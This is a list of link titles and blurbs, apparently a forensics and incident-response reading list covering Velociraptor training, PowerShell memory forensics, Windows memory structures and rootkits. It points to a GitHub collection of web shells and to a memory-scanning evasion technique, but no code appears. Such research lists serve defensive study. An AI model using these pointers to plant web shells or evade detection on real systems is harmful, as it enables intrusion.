Welcome :: Velociraptor - Digging deeper!
Book 3
Velociraptor Training :: Velociraptor - Digging deeper!
GitHub - TheBinitGhimire/Web-Shells: Some of the best web shells that you might need!
Some of the best web shells that you might need! Contribute to TheBinitGhimire/Web-Shells development by creating an account on GitHub.
Lee Holmes | Extracting Forensic Script Content from PowerShell Process Dumps
After posting Extracting Activity History from PowerShell Process Dumps, I got an interesting follow up question: “Is it possible to extract the content of scripts (from disk) that were executed, even if those files were not captured?” The answer is “Yes”, but it’s also complicated. And to make it even more complicated, we’re going to go down a path showing how to do some of this detective work from scratch. This is going to require a lot of WinDbg automation, so for a first step, install the WinDbg module.
gargoyle, a memory scanning evasion technique
The Blog of Josh Lospinoso
Pulling Back the Curtains on EncodedCommand PowerShell Attacks
GitHub - msuhanov/winmem_decompress: Extract compressed memory pages from page-aligned data
Extract compressed memory pages from page-aligned data - GitHub - msuhanov/winmem_decompress: Extract compressed memory pages from page-aligned data
Terminus Project - Changes in Memory Structures by OS version
Terminus Project by ReWolf, advanced NTDLLs structures diff, starting with Windows XP, up to Windows 10
Naming Files, Paths, and Namespaces (Windows)
All file systems supported by Windows use the concept of files and directories to access data stored on a disk or device.
Some Observations on Rootkits - Microsoft Malware Protection Center - Site Home - TechNet Blogs